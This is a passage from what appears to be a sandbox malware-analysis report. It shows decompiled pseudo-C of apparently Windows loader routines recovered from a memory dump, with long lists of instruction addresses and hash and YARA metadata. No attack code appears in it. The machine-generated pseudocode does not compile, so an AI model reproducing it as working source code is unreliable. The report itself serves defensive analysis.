							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E04B7FFB0(_t198, _t240, 0x4c58608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E04BA00C2(0x4c58608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x04b920a0
0x04b920a8
0x04b920ad
0x04b920b3
0x04b920b8
0x04b920c2
0x04b920c7
0x04b920cb
0x04b920d2
0x04b92263
0x04b92266
0x04bd5836
0x04bd5836
0x00000000
0x04b9226c
0x04b9226c
0x04b92270
0x04b92274
0x04b920e2
0x04b920e2
0x04b920e6
0x04b920ee
0x04bd57dc
0x04bd57de
0x04bd57ec
0x04bd57ec
0x04bd57f1
0x04bd57f3
0x04bd57f8
0x00000000
0x04bd57f8
0x04bd57e0
0x04bd57e4
0x04bd57ea
0x00000000
0x00000000
0x00000000
0x04bd57ea
0x04b920f4
0x04b920f4
0x04b920f8
0x04b920f8
0x04b920fc
0x04b92100
0x04b92106
0x04b92201
0x04b92206
0x04b9220b
0x04b9220e
0x04b922a9
0x04b922ac
0x00000000
0x00000000
0x04b922b2
0x04b922b5
0x04bd5801
0x04bd5806
0x00000000
0x00000000
0x04bd5810
0x04bd5815
0x04bd5818
0x00000000
0x00000000
0x04bd581e
0x04b922bb
0x04b922bb
0x04b92218
0x04b92218
0x04b9221c
0x04b92220
0x04b92222
0x04b922c2
0x04b922c4
0x04b922dc
0x04b922dc
0x04b922e1
0x00000000
0x00000000
0x00000000
0x04b922e7
0x04b922c8
0x04b922cd
0x04b922d3
0x04b922d6
0x04bd5823
0x04bd5825
0x04bd5827
0x00000000
0x00000000
0x04bd582d
0x00000000
0x04bd582d
0x00000000
0x04b92228
0x04b92228
0x00000000
0x04b92228
0x04b92222
0x04b92214
0x04b92214
0x00000000
0x04b92114
0x04b92114
0x04b92114
0x04b9211a
0x04b9211c
0x04b92348
0x04b9234d
0x04bd5840
0x04bd5845
0x04bd5848
0x04bd584e
0x04bd584e
0x04bd5848
0x04b92353
0x04b92355
0x04b92388
0x04b92388
0x04b92368
0x04b9236a
0x04b9236c
0x04b9238f
0x00000000
0x04b9236e
0x04b9236e
0x04b9218e
0x04b9218e
0x04b92191
0x04b92195
0x04bd5a03
0x04bd5a06
0x04bd5a0c
0x04bd5a0f
0x04bd5a11
0x04bd5a13
0x04bd5a13
0x04bd5a19
0x04bd5a1f
0x00000000
0x04b9219b
0x04b9219b
0x04b921a0
0x04b92282
0x04b92284
0x04b92284
0x04b92284
0x04b92284
0x04b921a6
0x04b921a9
0x04b921ac
0x04b921ae
0x04b921b3
0x04b9228b
0x04b92290
0x04b92379
0x04b92296
0x04b92298
0x04b92298
0x04b92290
0x04b921b9
0x04b921be
0x04b922a2
0x04b922a2
0x04b921c4
0x04b921c8
0x04b921cc
0x04b921d0
0x04b921d4
0x04b921de
0x04b921e3
0x04bd5a29
0x04bd5a2c
0x00000000
0x00000000
0x04bd5a3b
0x00000000
0x04b921e9
0x04b921e9
0x04b921e9
0x04b921ee
0x04b921f1
0x04bd5a45
0x04bd5a4b
0x04bd5a52
0x04bd5a58
0x04bd5a5d
0x04bd5a5f
0x04bd5a71
0x04bd5a61
0x04bd5a6a
0x04bd5a6a
0x04bd5a76
0x04bd5a79
0x04bd5a7f
0x04bd5a83
0x04bd5a85
0x04bd5a87
0x04bd5a87
0x04bd5a8c
0x04bd5a91
0x04bd5a97
0x04bd5a9f
0x04bd5aa0
0x04bd5aa1
0x04bd5aa6
0x04bd5aab
0x04bd5ab1
0x04bd5ab3
0x04bd5ab9
0x04bd5aca
0x04bd5ad4
0x04bd5ad4
0x04bd5ade
0x04bd5ade
0x04bd5aab
0x04bd5a79
0x04bd5a52
0x04b921f7
0x04b921f9
0x04b921fe
0x04b921fe
0x04b921e3
0x04b92195
0x04b9236c
0x04b92122
0x04b92122
0x04b92124
0x04b92231
0x04b92236
0x04b92236
0x04b92238
0x04b92238
0x04b92240
0x04b92242
0x04b92244
0x04bd59fc
0x04b9218c
0x04b9218c
0x00000000
0x04b9218c
0x04b9224a
0x04b9224f
0x04b92256
0x04b92304
0x04b92309
0x04b9230f
0x04b9231e
0x04b9231e
0x04b9231e
0x04b92320
0x04b92325
0x04b9232a
0x04b9232c
0x04b9233e
0x04b9233e
0x00000000
0x04b9232c
0x04b92311
0x04b92317
0x04b9231a
0x04b9231c
0x04b92380
0x04b92380
0x04b92380
0x04b92384
0x00000000
0x00000000
0x04b92386
0x00000000
0x04b9231c
0x04b9225c
0x04b9225c
0x00000000
0x04b9225c
0x04b9212a
0x04b92134
0x04b92138
0x04b9213d
0x04bd5858
0x04bd5863
0x04bd5863
0x04bd5867
0x04bd586a
0x00000000
0x00000000
0x04bd586c
0x04bd586c
0x04bd5871
0x04bd5875
0x04bd5877
0x04bd5997
0x04bd599c
0x04bd59a1
0x04bd59a7
0x04bd59a7
0x00000000
0x04bd59a7
0x04bd587d
0x00000000
0x04bd588b
0x04bd588b
0x04bd5890
0x04bd5892
0x04bd5894
0x04bd5899
0x04bd589b
0x04bd58a0
0x04bd58a0
0x04bd58aa
0x04bd58b2
0x04bd58b6
0x04bd58be
0x04bd58c6
0x04bd58c9
0x04bd590d
0x04bd5917
0x04bd591a
0x04bd591c
0x04bd5920
0x04bd5928
0x04bd592a
0x04bd592c
0x04bd592e
0x04bd592e
0x04bd58cb
0x04bd58cd
0x04bd58d8
0x04bd58e0
0x04bd58f4
0x04bd58fe
0x04bd58fe
0x04bd593a
0x04bd593e
0x04bd5940
0x04bd5942
0x00000000
0x04bd5944
0x04bd5944
0x04bd5949
0x04bd594e
0x04bd594e
0x04bd5953
0x04bd595b
0x04bd5976
0x04bd5976
0x04bd597a
0x04bd597f
0x00000000
0x00000000
0x00000000
0x00000000
0x04bd5981
0x04bd5981
0x04bd5981
0x04bd5983
0x04bd5988
0x04bd598d
0x04bd5991
0x04bd5991
0x00000000
0x04bd595d
0x04bd595d
0x04bd5963
0x04bd5965
0x00000000
0x00000000
0x00000000
0x00000000
0x04bd5967
0x04bd5967
0x04bd596b
0x04bd596d
0x00000000
0x00000000
0x04bd596f
0x04bd5971
0x04bd5971
0x04bd5974
0x00000000
0x00000000
0x00000000
0x04bd5974
0x00000000
0x04bd5967
0x04bd595b
0x04bd5942
0x04bd5863
0x04b92143
0x04b92143
0x04b92149
0x04b9214f
0x04b922f1
0x04b922f6
0x00000000
0x04b92173
0x04b92173
0x04b9217d
0x04b92181
0x04b92186
0x04bd59ae
0x04bd59b2
0x04bd59b5
0x04bd59b7
0x04bd59ba
0x04bd59cd
0x04bd59d1
0x04bd59d5
0x04bd59d9
0x04bd59db
0x00000000
0x00000000
0x04bd59dd
0x04bd59dd
0x04bd59e1
0x04bd59e4
0x04bd59e7
0x04bd59ee
0x04bd59ee
0x04bd59f3
0x04bd59f3
0x00000000
0x04b92186
0x04b9214f
0x04b92106
0x04b92266
0x04b920d8
0x04b920da
0x04b920e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 790114a7d492f2abd861de90cf274092425e651d929e0514ed71a220813d9738
Instruction ID: 5e0ce3fbfe19e224255d53fb984f4ad18a1aa6eadd30a8c99a85cf70979faf2a
Opcode Fuzzy Hash: 790114a7d492f2abd861de90cf274092425e651d929e0514ed71a220813d9738
Instruction Fuzzy Hash: 42F1B171A08341AFEB29CF28C44076A77E5EB85324F048DEDE8999B250E735FC51CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04B7D5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E04B7D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x4c5d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04B76600(0x4c552d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x4c57b9c; // 0x0
							_t281 = L04B84620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E04BAF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x4c57b90; // 0x775e0000
								if(_t384 == 0) {
									_t353 =  *0x4c57b8c; // 0xa92aa8
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E04B82280(_t200, 0x4c584d8);
									_t277 =  *0x4c585f4; // 0xa92f98
									_t351 =  *0x4c585f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xa92f30
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E04B7FFB0(_t287, _t353, 0x4c584d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E04BBCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04B76600(0x4c552d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04B77926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x4c5b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E04BEE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x4c58472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x4c5b218; // 0x0
														asm("ror edi, cl");
														 *0x4c5b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04B82280(_t250, 0x4c584d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04BA3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E04B7FFB0(_t293, _t353, 0x4c584d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E04BA37F5(_t353, 0);
																}
																E04BA0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04B99B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E04B902D6(_t174);
																}
																L04B877F0( *0x4c57b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E04B9C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L04B7EC7F(_t353);
										L04B919B8(_t287, 0, _t353, 0);
										_t200 = E04B6F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E04BAB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x4c5b2f8; // 0x13f0000
									if((_t206 |  *0x4c5b2fc) == 0 || ( *0x4c5b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x4c5b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04C16B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04C16AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E04B7E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L04B7EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04BA9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E04B7E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04B78F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04BA3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x04b7d5f2
0x04b7d5f5
0x04b7d5f5
0x04b7d5fd
0x04b7d600
0x04b7d60a
0x04b7d60d
0x04b7d617
0x04b7d61d
0x04b7d627
0x04b7d62e
0x04b7d911
0x04b7d913
0x00000000
0x04b7d919
0x04b7d919
0x04b7d919
0x04b7d634
0x04b7d634
0x04b7d634
0x04b7d634
0x04b7d640
0x04b7d8bf
0x00000000
0x04b7d646
0x04b7d646
0x04b7d64d
0x04b7d652
0x04bcb2fc
0x04bcb2fc
0x04bcb302
0x04bcb33b
0x04bcb341
0x00000000
0x04bcb304
0x04bcb304
0x04bcb319
0x04bcb31e
0x04bcb324
0x04bcb326
0x04bcb332
0x04bcb347
0x04bcb34c
0x04bcb351
0x04bcb35a
0x00000000
0x04bcb328
0x04bcb328
0x00000000
0x04bcb328
0x04bcb326
0x04b7d658
0x04b7d658
0x04b7d65b
0x04b7d665
0x00000000
0x04b7d66b
0x04b7d66b
0x04b7d66b
0x04b7d66b
0x04b7d66d
0x04b7d672
0x04b7d67a
0x00000000
0x00000000
0x04b7d680
0x04b7d686
0x04b7d8ce
0x04b7d8d4
0x04b7d8dd
0x04b7d8e0
0x04b7d68c
0x04b7d691
0x04b7d69d
0x04b7d6a2
0x04b7d6a7
0x04b7d6b0
0x04b7d6b5
0x04b7d6e0
0x04b7d6b7
0x04b7d6b7
0x04b7d6b9
0x04b7d6b9
0x04b7d6bb
0x04b7d6bd
0x04b7d6ce
0x04b7d6d0
0x04b7d6d2
0x04bcb363
0x04bcb365
0x00000000
0x04bcb36b
0x00000000
0x04bcb36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04b7d6bf
0x04b7d6bf
0x04b7d6e5
0x04b7d6e7
0x04b7d6e9
0x04b7d6ec
0x04b7d6ec
0x04b7d6ef
0x04b7d6f5
0x04b7d6f9
0x04b7d6fb
0x04b7d6fd
0x04b7d701
0x04b7d703
0x04b7d70a
0x04b7d70a
0x04b7d701
0x04b7d710
0x04b7d710
0x04b7d6c1
0x04b7d6c1
0x04b7d6c6
0x04bcb36d
0x04bcb36f
0x00000000
0x04bcb375
0x04bcb375
0x04bcb375
0x00000000
0x04bcb375
0x00000000
0x04b7d6cc
0x04b7d6d8
0x04b7d6d8
0x04b7d6d8
0x00000000
0x04b7d6c6
0x04b7d6bf
0x00000000
0x04b7d6da
0x04b7d6da
0x04b7d716
0x04b7d71b
0x04b7d720
0x04b7d726
0x04b7d726
0x04b7d72d
0x00000000
0x04b7d733
0x04b7d739
0x04b7d742
0x04b7d750
0x04b7d758
0x04b7d764
0x04b7d776
0x04b7d77a
0x04b7d783
0x04b7d928
0x04b7d92c
0x04b7d93d
0x04b7d944
0x04b7d94f
0x04b7d954
0x04b7d956
0x04b7d95f
0x04b7d961
0x04b7d973
0x04b7d973
0x04b7d956
0x04b7d944
0x04b7d92c
0x04b7d78b
0x04bcb394
0x04b7d791
0x04b7d798
0x04bcb3a3
0x04bcb3bb
0x04bcb3bb
0x04b7d7a5
0x04b7d866
0x04b7d870
0x04b7d884
0x04b7d892
0x04b7d898
0x04b7d89e
0x04b7d8a0
0x04b7d8a6
0x04b7d8ac
0x04b7d8ae
0x04b7d8b4
0x04b7d8b4
0x04b7d8ae
0x04b7d7a5
0x04b7d78b
0x04b7d7b1
0x04bcb3c5
0x04bcb3c5
0x04b7d7c3
0x04b7d7ca
0x04b7d7e5
0x04b7d7eb
0x04b7d8eb
0x04b7d8ed
0x00000000
0x04b7d8f3
0x04b7d8f3
0x04b7d8f3
0x00000000
0x04b7d8ed
0x04b7d7cc
0x04b7d7cc
0x04b7d7d2
0x00000000
0x04b7d7d4
0x04b7d7d4
0x04b7d7d7
0x04b7d7df
0x04bcb3d4
0x04bcb3d9
0x04bcb3dc
0x04bcb3dc
0x04bcb3df
0x04bcb3e2
0x04bcb468
0x04bcb46d
0x04bcb46f
0x04bcb46f
0x04bcb475
0x04b7d8f8
0x04b7d8f9
0x04b7d8fd
0x04bcb3e8
0x04bcb3e8
0x04bcb3eb
0x04bcb3ed
0x00000000
0x04bcb3ef
0x04bcb3ef
0x04bcb3f1
0x04bcb3f4
0x04bcb3fe
0x04bcb404
0x04bcb409
0x04bcb40e
0x04bcb410
0x04bcb410
0x04bcb414
0x04bcb414
0x04bcb41b
0x04bcb420
0x04bcb423
0x04bcb425
0x04bcb427
0x04bcb42a
0x04bcb42d
0x04bcb42d
